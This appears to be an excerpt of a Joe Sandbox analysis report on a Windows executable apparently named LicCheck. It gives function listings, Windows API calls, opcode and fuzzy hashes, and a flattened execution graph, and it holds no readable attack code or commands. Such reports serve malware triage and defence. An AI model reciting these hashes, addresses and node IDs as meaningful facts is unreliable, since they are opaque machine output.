                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00796384
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Concurrency::cancel_current_taskIos_base_dtorstd::ios_base::_
                                                                                                    • String ID: (Hy
                                                                                                    • API String ID: 4106036149-3630613215
                                                                                                    • Opcode ID: 1f7ec947c7a0ca8ef41092dc50f79940cff31838429dcd31ea1bcb2cb76587bc
                                                                                                    • Instruction ID: 5761281a3926419afb2e651edf5fb1b3e89d728d3579ff43d3f1a552408b3173
                                                                                                    • Opcode Fuzzy Hash: 1f7ec947c7a0ca8ef41092dc50f79940cff31838429dcd31ea1bcb2cb76587bc
                                                                                                    • Instruction Fuzzy Hash: 3F41F3B1A00605DFD710CF28E889B5AB7E8FF45314F14436EE85587381E779E9158790
                                                                                                    Function 007A8EAF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EncodePointer.KERNEL32(00000000,?), ref: 007A8ED4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EncodePointer
                                                                                                    • String ID: MOC$RCC
                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                    • Opcode ID: b9c87183af017b7b3eee9f994ede4f7014e206294aff9fb8db3bdb4b3cd2f98d
                                                                                                    • Instruction ID: 70f2388ff419988a865c18f5e770cf0b171687c7c73d4f624dc53907165611e1
                                                                                                    • Opcode Fuzzy Hash: b9c87183af017b7b3eee9f994ede4f7014e206294aff9fb8db3bdb4b3cd2f98d
                                                                                                    • Instruction Fuzzy Hash: 6B414C7190020AEFCF15DF94CC85AEE7BB6FF89304F188259FA0467211D7399951DB92
                                                                                                    Function 007A4490 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 007A449F
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 007A44F7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                    • String ID: 0'y
                                                                                                    • API String ID: 593203224-674645887
                                                                                                    • Opcode ID: eb9dca69b7213967d0bd363d53dc530a813c43cbd94b1185b529d430c44acb37
                                                                                                    • Instruction ID: 9a3745c9f4802d9abddf030ae65fd71674f094a9ea5fe4ac6f0e2ac49fa0575b
                                                                                                    • Opcode Fuzzy Hash: eb9dca69b7213967d0bd363d53dc530a813c43cbd94b1185b529d430c44acb37
                                                                                                    • Instruction Fuzzy Hash: 9E019A35600604EFCB05DF59C889E9EBBB8EFC9310B044099E8019B3A1DBB6FE40CB60
                                                                                                    Function 007B525C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,007B3A93,-00000020,00000FA0,00000000,00000002,00000040,?,61DA755C), ref: 007B529C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                    • String ID: 0'y$InitializeCriticalSectionEx
                                                                                                    • API String ID: 2593887523-2727338366
                                                                                                    • Opcode ID: 79d165f7d6cb01b25d6b56f5e9e483e9577241b5d5bcbbd0f92565c36c73f8fa
                                                                                                    • Instruction ID: d6826c8ea2ba0e4d79585147f2530784e096494d09fae4644e0081295b6d8a85
                                                                                                    • Opcode Fuzzy Hash: 79d165f7d6cb01b25d6b56f5e9e483e9577241b5d5bcbbd0f92565c36c73f8fa
                                                                                                    • Instruction Fuzzy Hash: 7EE09272580358BBCB112F51CC0AFDD3F12EB40761F488028FD0C151A0CBBB9861DB90
                                                                                                    Function 007B50E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc
                                                                                                    • String ID: 0'y$FlsAlloc
                                                                                                    • API String ID: 2773662609-1480116698
                                                                                                    • Opcode ID: cd1e76ccf88cca70516c4c1d399c64f090a137488873a466e7be0775e9ca823e
                                                                                                    • Instruction ID: ee4577f6a728f7ce66a978a69feba6da71c04f0716ba149f3c0d5ecfb2923230
                                                                                                    • Opcode Fuzzy Hash: cd1e76ccf88cca70516c4c1d399c64f090a137488873a466e7be0775e9ca823e
                                                                                                    • Instruction Fuzzy Hash: DBE0C23268062CB3861437669C0FFDE7F048B90BA1B0840A8FA041628199EE5951C6E5

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:18.3%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:3.1%
                                                                                                    Total number of Nodes:524
                                                                                                    Total number of Limit Nodes:15
                                                                                                    execution_graph 5628 7ff7d3b984e0 5629 7ff7d3b984f7 memset 5628->5629 5630 7ff7d3b98520 5628->5630 5629->5630 5631 7ff7d3b985e0 wcscpy wcslen 5632 7ff7d3b9860d 5631->5632 5893 7ff7d3b9fc60 ___lc_codepage_func ___mb_cur_max_func 5894 7ff7d3b9fcb9 5893->5894 5895 7ff7d3b9fca1 5893->5895 5895->5894 5896 7ff7d3b9fcb2 5895->5896 5899 7ff7d3b9fd20 5895->5899 5896->5894 5898 7ff7d3b9fa80 4 API calls 5896->5898 5897 7ff7d3b9fa80 4 API calls 5897->5899 5898->5896 5899->5894 5899->5897 5900 7ff7d3b99760 5901 7ff7d3b99772 5900->5901 5902 7ff7d3b99782 5901->5902 5905 7ff7d3b9a2c0 5901->5905 5904 7ff7d3b997c7 5906 7ff7d3b9a365 5905->5906 5911 7ff7d3b9a2ce 5905->5911 5907 7ff7d3b9a3a0 InitializeCriticalSection 5906->5907 5908 7ff7d3b9a36f 5906->5908 5907->5908 5908->5904 5909 7ff7d3b9a2d2 5909->5904 5910 7ff7d3b9a341 DeleteCriticalSection 5910->5909 5911->5909 5911->5910 5912 7ff7d3b9a330 free 5911->5912 5912->5910 5912->5912 5913 7ff7d3b98760 5914 7ff7d3b98640 4 API calls 5913->5914 5915 7ff7d3b98792 5914->5915 5633 7ff7d3b952dc 5634 7ff7d3b952ef 5633->5634 5707 7ff7d3b963d6 5633->5707 5708 7ff7d3b985b0 wcscpy 5634->5708 5701 7ff7d3b97530 memset 5709 7ff7d3b985b0 wcscpy 5701->5709 5703 7ff7d3b963df 5707->5701 5707->5703 5916 7ff7d3b99d5b 5917 7ff7d3b99d69 5916->5917 5919 7ff7d3b99c23 5916->5919 5918 7ff7d3b99ba2 5919->5918 5920 7ff7d3b99d32 VirtualProtect 5919->5920 5920->5919 5710 7ff7d3b9eef0 5711 7ff7d3b9ef10 DeleteCriticalSection 5710->5711 5712 7ff7d3b9ef05 5710->5712 5713 7ff7d3b997f0 5714 7ff7d3b9980f 5713->5714 5715 7ff7d3b99846 fprintf 5714->5715 5921 7ff7d3b9cf70 5922 7ff7d3b9d208 5921->5922 5923 7ff7d3b9cf79 5921->5923 5924 7ff7d3b9d1f6 5923->5924 5925 7ff7d3b9b280 2 API calls 5923->5925 5926 7ff7d3b9cfa3 5925->5926 5927 7ff7d3b9d770 5928 7ff7d3b9d779 5927->5928 5929 7ff7d3b9ef40 2 API calls 5928->5929 5930 7ff7d3b9d78e 5929->5930 5931 7ff7d3b9d6c0 5930->5931 5935 7ff7d3b9d82f 5930->5935 5932 7ff7d3b9d430 2 API calls 5931->5932 5941 7ff7d3b9d6f0 5932->5941 5933 7ff7d3b9dc39 5934 7ff7d3b9d400 2 API calls 5948 7ff7d3b9da3f 5934->5948 5935->5933 5936 7ff7d3b9dc51 5935->5936 5937 7ff7d3b9da00 5935->5937 5935->5948 5936->5934 5936->5948 5949 7ff7d3b9d400 5937->5949 5939 7ff7d3b9f170 malloc LeaveCriticalSection 5939->5948 5940 7ff7d3b9f2d0 malloc LeaveCriticalSection memcpy LeaveCriticalSection LeaveCriticalSection 5940->5948 5942 7ff7d3b9dea1 5942->5941 5953 7ff7d3b9f0b0 5942->5953 5944 7ff7d3b9ef40 2 API calls 5945 7ff7d3b9e9d6 memcpy 5944->5945 5945->5948 5946 7ff7d3b9f0b0 malloc LeaveCriticalSection memcpy 5946->5948 5948->5939 5948->5940 5948->5941 5948->5942 5948->5944 5948->5946 5959 7ff7d3b9f590 5948->5959 5950 7ff7d3b9d40c 5949->5950 5951 7ff7d3b9ef40 2 API calls 5950->5951 5952 7ff7d3b9d424 5951->5952 5952->5948 5954 7ff7d3b9f0d0 5953->5954 5955 7ff7d3b9f0fb 5954->5955 5956 7ff7d3b9ef40 2 API calls 5954->5956 5955->5941 5957 7ff7d3b9f12b 5956->5957 5957->5955 5958 7ff7d3b9f133 memcpy 5957->5958 5958->5955 5960 7ff7d3b9f5db 5959->5960 5961 7ff7d3b9f5ad 5959->5961 5962 7ff7d3b9ef40 2 API calls 5960->5962 5961->5960 5963 7ff7d3b9f6e0 5961->5963 5965 7ff7d3b9f5e9 5962->5965 5964 7ff7d3b9ef40 2 API calls 5963->5964 5964->5965 5965->5948 5966 7ff7d3b9fd70 ___mb_cur_max_func ___lc_codepage_func 5967 7ff7d3b9fa80 4 API calls 5966->5967 5968 7ff7d3b9fdbd 5967->5968 5969 7ff7d3b9cb68 5970 7ff7d3b9cb74 5969->5970 5971 7ff7d3b9d26f wcslen 5970->5971 5972 7ff7d3b9cb9c 5970->5972 5973 7ff7d3b9b280 2 API calls 5972->5973 5974 7ff7d3b9cbb4 5973->5974 5716 7ff7d3b9ceee 5719 7ff7d3b9b280 5716->5719 5718 7ff7d3b9cf0b 5718->5718 5720 7ff7d3b9b29a 5719->5720 5721 7ff7d3b9b3e1 fwprintf 5720->5721 5722 7ff7d3b9b3aa fwprintf 5720->5722 5723 7ff7d3b9b2bd 5720->5723 5721->5723 5722->5723 5723->5718 5975 7ff7d3b9ca6e 5976 7ff7d3b9cf27 5975->5976 5977 7ff7d3b9ca9d 5975->5977 5979 7ff7d3b9b280 2 API calls 5976->5979 5978 7ff7d3b9afd0 8 API calls 5977->5978 5980 7ff7d3b9cab3 5978->5980 5981 7ff7d3b9cf48 5979->5981 5980->5976 5983 7ff7d3b9ca64 5980->5983 5982 7ff7d3b9d0e0 5985 7ff7d3b9b930 10 API calls 5982->5985 5983->5982 5984 7ff7d3b9b930 10 API calls 5983->5984 5984->5983 5986 7ff7d3b9d0fa 5985->5986 5986->5986 5724 7ff7d3b9a400 5725 7ff7d3b9a450 5724->5725 5726 7ff7d3b9a40d 5724->5726 5729 7ff7d3b9a4f0 InitializeCriticalSection TlsAlloc 5725->5729 5730 7ff7d3b9a45e 5725->5730 5727 7ff7d3b9a470 5726->5727 5728 7ff7d3b9a411 5726->5728 5733 7ff7d3b9a4a0 TlsGetValue 5727->5733 5734 7ff7d3b9a47c 5727->5734 5731 7ff7d3b9a443 5728->5731 5732 7ff7d3b9a416 TlsGetValue 5728->5732 5729->5730 5737 7ff7d3b9a3c0 free 5732->5737 5736 7ff7d3b9a3c0 free 5733->5736 5734->5731 5735 7ff7d3b9a485 DeleteCriticalSection 5734->5735 5735->5731 5738 7ff7d3b9a4bb TlsSetValue 5736->5738 5739 7ff7d3b9a431 TlsSetValue 5737->5739 5740 7ff7d3b9a3c0 free 5738->5740 5739->5731 5741 7ff7d3b9a4d8 TlsFree 5740->5741 5741->5734 5987 7ff7d3b9a780 strlen 5988 7ff7d3b9a7fe 5987->5988 5989 7ff7d3b9a795 5987->5989 5989->5988 5990 7ff7d3b9a7e9 strncmp 5989->5990 5990->5988 5990->5989 5478 7ff7d3b97285 5483 7ff7d3b9728a 5478->5483 5479 7ff7d3b97528 5480 7ff7d3b9746d strstr 5480->5483 5481 7ff7d3b97511 5485 7ff7d3b98c10 5481->5485 5483->5479 5483->5480 5483->5481 5484 7ff7d3b974dd strcat strcat strlen 5483->5484 5484->5480 5484->5481 5490 7ff7d3b98800 wcslen 5485->5490 5489 7ff7d3b98c53 5489->5479 5494 7ff7d3b98830 5490->5494 5491 7ff7d3b9884e memset wcscpy 5492 7ff7d3b98640 4 API calls 5491->5492 5492->5494 5493 7ff7d3b98905 5495 7ff7d3b98640 memset 5493->5495 5494->5491 5494->5493 5496 7ff7d3b9868f 5495->5496 5497 7ff7d3b986f1 wcscpy wcscat wcslen 5496->5497 5497->5489 5742 7ff7d3b9cdf7 5743 7ff7d3b9ce31 5742->5743 5744 7ff7d3b9ce1e 5742->5744 5745 7ff7d3b9be60 12 API calls 5743->5745 5748 7ff7d3b9be60 5744->5748 5747 7ff7d3b9d138 5745->5747 5747->5747 5749 7ff7d3b9be79 5748->5749 5750 7ff7d3b9bf84 5749->5750 5751 7ff7d3b9beb4 5749->5751 5777 7ff7d3b9b160 5750->5777 5753 7ff7d3b9bf20 5751->5753 5754 7ff7d3b9bec8 5751->5754 5756 7ff7d3b9bf24 strlen 5753->5756 5757 7ff7d3b9bf2f 5753->5757 5758 7ff7d3b9bed0 5754->5758 5759 7ff7d3b9bfa4 strlen 5754->5759 5755 7ff7d3b9bf93 5755->5743 5756->5757 5773 7ff7d3b9bce0 5757->5773 5764 7ff7d3b9b400 5758->5764 5759->5758 5763 7ff7d3b9bee7 5763->5743 5766 7ff7d3b9b422 5764->5766 5765 7ff7d3b9b5b2 5771 7ff7d3b9b5d1 5765->5771 5781 7ff7d3b9b200 5765->5781 5766->5765 5768 7ff7d3b9b6b0 5766->5768 5769 7ff7d3b9b49b 5766->5769 5770 7ff7d3b9b200 4 API calls 5768->5770 5768->5771 5769->5765 5772 7ff7d3b9b280 2 API calls 5769->5772 5770->5771 5771->5763 5772->5769 5774 7ff7d3b9bd16 5773->5774 5775 7ff7d3b9b400 6 API calls 5774->5775 5776 7ff7d3b9bd81 5775->5776 5778 7ff7d3b9b174 5777->5778 5778->5778 5801 7ff7d3b9afd0 5778->5801 5780 7ff7d3b9b1ae 5780->5755 5782 7ff7d3b9b230 5781->5782 5784 7ff7d3b9b20f 5781->5784 5785 7ff7d3b9fbf0 5782->5785 5784->5771 5786 7ff7d3b9fc1e 5785->5786 5789 7ff7d3b9fa80 5786->5789 5788 7ff7d3b9fc4b 5788->5784 5790 7ff7d3b9fbb3 5789->5790 5791 7ff7d3b9fa95 5789->5791 5790->5788 5792 7ff7d3b9fb34 5791->5792 5795 7ff7d3b9fae4 5791->5795 5796 7ff7d3b9fac9 IsDBCSLeadByteEx 5791->5796 5799 7ff7d3b9fb51 5791->5799 5793 7ff7d3b9fb80 MultiByteToWideChar 5792->5793 5794 7ff7d3b9fb3f 5792->5794 5798 7ff7d3b9fbc3 _errno 5793->5798 5793->5799 5794->5788 5797 7ff7d3b9fb0e MultiByteToWideChar 5795->5797 5795->5799 5796->5792 5796->5795 5797->5798 5800 7ff7d3b9fb28 5797->5800 5798->5799 5799->5788 5800->5788 5802 7ff7d3b9b0f5 5801->5802 5803 7ff7d3b9afec 5801->5803 5804 7ff7d3b9b108 5802->5804 5805 7ff7d3b9b13a fwprintf 5802->5805 5803->5802 5812 7ff7d3b9b00f 5803->5812 5806 7ff7d3b9b115 fwprintf 5804->5806 5807 7ff7d3b9b14e fwprintf 5804->5807 5808 7ff7d3b9b121 5805->5808 5806->5808 5807->5808 5808->5780 5809 7ff7d3b9b029 5809->5780 5810 7ff7d3b9b04b strlen 5811 7ff7d3b9fbf0 4 API calls 5810->5811 5811->5812 5812->5809 5812->5810 5552 7ff7d3b952fd 5553 7ff7d3b95323 5552->5553 5627 7ff7d3b985b0 wcscpy 5553->5627 5555 7ff7d3b95407 memset 5556 7ff7d3b95440 5555->5556 5557 7ff7d3b985b0 wcscpy 5556->5557 5558 7ff7d3b954c9 memset 5557->5558 5559 7ff7d3b9555b 5558->5559 5560 7ff7d3b985b0 wcscpy 5559->5560 5626 7ff7d3b963d6 5559->5626 5561 7ff7d3b955ca memcpy 5560->5561 5563 7ff7d3b955eb 5561->5563 5562 7ff7d3b965c0 5564 7ff7d3b965ca memcpy 5562->5564 5563->5562 5565 7ff7d3b97f10 16 API calls 5563->5565 5564->5626 5566 7ff7d3b95662 memcpy 5565->5566 5568 7ff7d3b95683 5566->5568 5567 7ff7d3b96586 5569 7ff7d3b96590 memcpy 5567->5569 5568->5567 5570 7ff7d3b97f10 16 API calls 5568->5570 5569->5562 5571 7ff7d3b956f4 memcpy 5570->5571 5573 7ff7d3b95715 5571->5573 5572 7ff7d3b96405 5574 7ff7d3b96556 memcpy 5572->5574 5573->5572 5575 7ff7d3b97f10 16 API calls 5573->5575 5574->5567 5576 7ff7d3b95784 memset 5575->5576 5577 7ff7d3b957e7 5576->5577 5577->5572 5578 7ff7d3b985b0 wcscpy 5577->5578 5579 7ff7d3b9584d 5578->5579 5580 7ff7d3b98a60 memset wcscpy wcscat wcslen 5579->5580 5581 7ff7d3b9585a 5580->5581 5582 7ff7d3b958b6 memset GetModuleFileNameW memset 5581->5582 5581->5626 5583 7ff7d3b9594d 5582->5583 5583->5572 5584 7ff7d3b985b0 wcscpy 5583->5584 5585 7ff7d3b95a90 memcpy 5584->5585 5586 7ff7d3b95ab1 5585->5586 5587 7ff7d3b95afe 5586->5587 5588 7ff7d3b95aca memcpy 5586->5588 5589 7ff7d3b97f10 16 API calls 5587->5589 5588->5587 5590 7ff7d3b95b7a memset 5589->5590 5591 7ff7d3b95bb5 5590->5591 5591->5572 5592 7ff7d3b95bbe 5591->5592 5593 7ff7d3b985b0 wcscpy 5592->5593 5594 7ff7d3b95c06 _wcsicmp 5593->5594 5595 7ff7d3b975c0 5594->5595 5596 7ff7d3b95c19 memset 5594->5596 5597 7ff7d3b98a60 memset wcscpy wcscat wcslen 5595->5597 5600 7ff7d3b95c5c 5596->5600 5598 7ff7d3b975cb 5597->5598 5599 7ff7d3b98c10 7 API calls 5598->5599 5603 7ff7d3b975e5 5599->5603 5601 7ff7d3b985b0 wcscpy 5600->5601 5602 7ff7d3b95cf5 5601->5602 5604 7ff7d3b95ddf memset 5602->5604 5602->5626 5605 7ff7d3b95e27 5604->5605 5605->5603 5606 7ff7d3b985b0 wcscpy 5605->5606 5607 7ff7d3b95f5b memset 5606->5607 5608 7ff7d3b95f94 5607->5608 5609 7ff7d3b985b0 wcscpy 5608->5609 5610 7ff7d3b96024 5609->5610 5611 7ff7d3b98c10 7 API calls 5610->5611 5612 7ff7d3b96044 5611->5612 5613 7ff7d3b97fd0 31 API calls 5612->5613 5614 7ff7d3b96052 5613->5614 5614->5603 5615 7ff7d3b96285 memcpy 5614->5615 5616 7ff7d3b962a6 5615->5616 5617 7ff7d3b962bd memcpy 5616->5617 5618 7ff7d3b962ea 5616->5618 5617->5618 5619 7ff7d3b963c1 _wcsicmp 5618->5619 5620 7ff7d3b97530 memset 5619->5620 5619->5626 5621 7ff7d3b985b0 wcscpy 5620->5621 5623 7ff7d3b97556 memset 5621->5623 5622 7ff7d3b963df 5624 7ff7d3b985b0 wcscpy 5623->5624 5625 7ff7d3b97574 5624->5625 5626->5620 5626->5622 5991 7ff7d3b9ce7d 5992 7ff7d3b9ce86 5991->5992 5995 7ff7d3b9b7e0 5992->5995 5996 7ff7d3b9b820 strlen 5995->5996 5997 7ff7d3b9b805 5995->5997 5996->5997 5997->5996 5813 7ff7d3b9cf10 5814 7ff7d3b9cf27 5813->5814 5815 7ff7d3b9b280 2 API calls 5814->5815 5816 7ff7d3b9cf48 5815->5816 5817 7ff7d3b9d710 5820 7ff7d3b9d430 5817->5820 5821 7ff7d3b9d443 5820->5821 5824 7ff7d3b9ef40 5821->5824 5826 7ff7d3b9ef4f 5824->5826 5825 7ff7d3b9ef54 malloc 5827 7ff7d3b9ef81 5825->5827 5828 7ff7d3b9d464 5825->5828 5826->5825 5826->5827 5827->5828 5829 7ff7d3b9efc3 LeaveCriticalSection 5827->5829 5829->5828 5830 7ff7d3b91010 5831 7ff7d3b9104b 5830->5831 5832 7ff7d3b9106d __set_app_type 5831->5832 5833 7ff7d3b91077 5831->5833 5832->5833 6001 7ff7d3b91291 6002 7ff7d3b912e7 malloc 6001->6002 6005 7ff7d3b9131e 6002->6005 6006 7ff7d3b913b0 6002->6006 6004 7ff7d3b91351 malloc memcpy 6004->6005 6004->6006 6005->6004 6005->6005 6007 7ff7d3b9cc91 6009 7ff7d3b9cd44 6007->6009 6010 7ff7d3b9ccb8 6007->6010 6008 7ff7d3b9b160 8 API calls 6013 7ff7d3b9d1b9 6008->6013 6012 7ff7d3b9d345 6009->6012 6009->6013 6011 7ff7d3b9d3c7 6010->6011 6010->6012 6010->6013 6018 7ff7d3b9bfd0 6010->6018 6016 7ff7d3b9b160 8 API calls 6011->6016 6015 7ff7d3b9b160 8 API calls 6012->6015 6013->6008 6015->6011 6017 7ff7d3b9d3f4 6016->6017 6017->6017 6020 7ff7d3b9bfef 6018->6020 6019 7ff7d3b9c0f6 6019->6009 6020->6019 6021 7ff7d3b9b200 4 API calls 6020->6021 6022 7ff7d3b9b280 2 API calls 6020->6022 6021->6020 6022->6020 6023 7ff7d3b9a195 6024 7ff7d3b9a1c4 6023->6024 6025 7ff7d3b9a1b9 6023->6025 6024->6025 6026 7ff7d3b9a1db EnterCriticalSection LeaveCriticalSection 6024->6026 5837 7ff7d3b9a5a0 5838 7ff7d3b9a635 5837->5838 5839 7ff7d3b9a5b7 5837->5839 5840 7ff7d3b9a5e1 calloc 5839->5840 5840->5838 5841 7ff7d3b9a5f8 EnterCriticalSection LeaveCriticalSection 5840->5841 6030 7ff7d3b9a220 6031 7ff7d3b9a240 EnterCriticalSection 6030->6031 6032 7ff7d3b9a231 6030->6032 6033 7ff7d3b9a273 LeaveCriticalSection 6031->6033 6036 7ff7d3b9a259 6031->6036 6034 7ff7d3b9a280 6033->6034 6035 7ff7d3b9a25f free LeaveCriticalSection 6035->6034 6036->6033 6036->6035 6027 7ff7d3b9f820 6028 7ff7d3b9ef40 2 API calls 6027->6028 6029 7ff7d3b9f83c 6028->6029 5498 7ff7d3b94fa6 5499 7ff7d3b94fe1 5498->5499 5500 7ff7d3b95081 _wgetenv 5499->5500 5505 7ff7d3b985b0 wcscpy 5500->5505 5502 7ff7d3b95098 5503 7ff7d3b99100 19 API calls 5502->5503 5504 7ff7d3b950bf 5503->5504 5504->5504 6041 7ff7d3b99c18 6042 7ff7d3b99c20 6041->6042 6043 7ff7d3b99ba2 6041->6043 6042->6043 6044 7ff7d3b99d32 VirtualProtect 6042->6044 6044->6042 5842 7ff7d3b91298 5843 7ff7d3b9129d 5842->5843 5844 7ff7d3b912c0 5842->5844 5844->5844 5845 7ff7d3b912f3 malloc 5844->5845 5847 7ff7d3b9131e 5845->5847 5848 7ff7d3b913b0 5845->5848 5846 7ff7d3b91351 malloc memcpy 5846->5847 5846->5848 5847->5846 5847->5847 5545 7ff7d3b9139c 5546 7ff7d3b912f3 malloc 5545->5546 5549 7ff7d3b9131e 5546->5549 5551 7ff7d3b913b5 5546->5551 5547 7ff7d3b9134d 5548 7ff7d3b91351 malloc memcpy 5547->5548 5547->5549 5548->5547 5550 7ff7d3b913b0 5548->5550 5549->5547 5549->5549 5550->5551 5463 7ff7d3b9fa30 5464 7ff7d3b9fa40 5463->5464 5465 7ff7d3b9fa49 5463->5465 5467 7ff7d3b9a540 5464->5467 5468 7ff7d3b9a550 TlsGetValue 5467->5468 5469 7ff7d3b9a548 5467->5469 5474 7ff7d3b9a3c0 5468->5474 5469->5465 5472 7ff7d3b9a3c0 free 5473 7ff7d3b9a594 5472->5473 5473->5465 5475 7ff7d3b9a3d2 free 5474->5475 5476 7ff7d3b9a3ec TlsSetValue TlsFree 5474->5476 5475->5476 5476->5472 6045 7ff7d3b99730 6046 7ff7d3b99739 6045->6046 6047 7ff7d3b9973d 6046->6047 6048 7ff7d3b9a2c0 3 API calls 6046->6048 6049 7ff7d3b99755 6048->6049 6050 7ff7d3b99a31 6051 7ff7d3b99a3a 6050->6051 6055 7ff7d3b99b45 6050->6055 6052 7ff7d3b99ac0 VirtualProtect 6051->6052 6054 7ff7d3b99a4e 6051->6054 6053 7ff7d3b99afc GetLastError 6052->6053 6052->6054 6056 7ff7d3b99b10 6053->6056 6057 7ff7d3b9cb2a 6058 7ff7d3b9cb38 6057->6058 6059 7ff7d3b9cf83 6057->6059 6059->6058 6060 7ff7d3b9b280 2 API calls 6059->6060 6060->6058 6061 7ff7d3b9d029 6062 7ff7d3b9d020 6061->6062 6063 7ff7d3b9d02e localeconv 6061->6063 6064 7ff7d3b9fbf0 4 API calls 6063->6064 6065 7ff7d3b9d068 6064->6065 5506 7ff7d3b9ad2c 5507 7ff7d3b9ae68 5506->5507 5508 7ff7d3b9ad3c 5506->5508 5511 7ff7d3b9ae72 5507->5511 5512 7ff7d3b9ae21 5507->5512 5509 7ff7d3b9ad4a 5508->5509 5510 7ff7d3b9ae9c WaitForSingleObject 5508->5510 5517 7ff7d3b9ae3a 5508->5517 5513 7ff7d3b9ae47 5509->5513 5516 7ff7d3b9acb1 GetLastError TlsGetValue 5509->5516 5519 7ff7d3b9ad6f ReleaseSemaphore 5509->5519 5510->5509 5511->5508 5515 7ff7d3b9ae8c 5511->5515 5540 7ff7d3b9ac10 CreateSemaphoreW TlsAlloc 5512->5540 5518 7ff7d3b9ae90 Sleep 5515->5518 5520 7ff7d3b9accb SetLastError 5516->5520 5517->5513 5517->5516 5518->5518 5521 7ff7d3b9ae9a 5518->5521 5519->5516 5522 7ff7d3b9ad90 calloc 5520->5522 5529 7ff7d3b9acdf 5520->5529 5521->5508 5524 7ff7d3b9adb0 5522->5524 5525 7ff7d3b9aec3 abort 5522->5525 5523 7ff7d3b9aceb 5526 7ff7d3b9ac97 5523->5526 5532 7ff7d3b9ab70 5523->5532 5527 7ff7d3b9adb3 TlsSetValue 5524->5527 5531 7ff7d3b9aed5 5525->5531 5527->5523 5529->5523 5529->5525 5530 7ff7d3b9ae05 memset 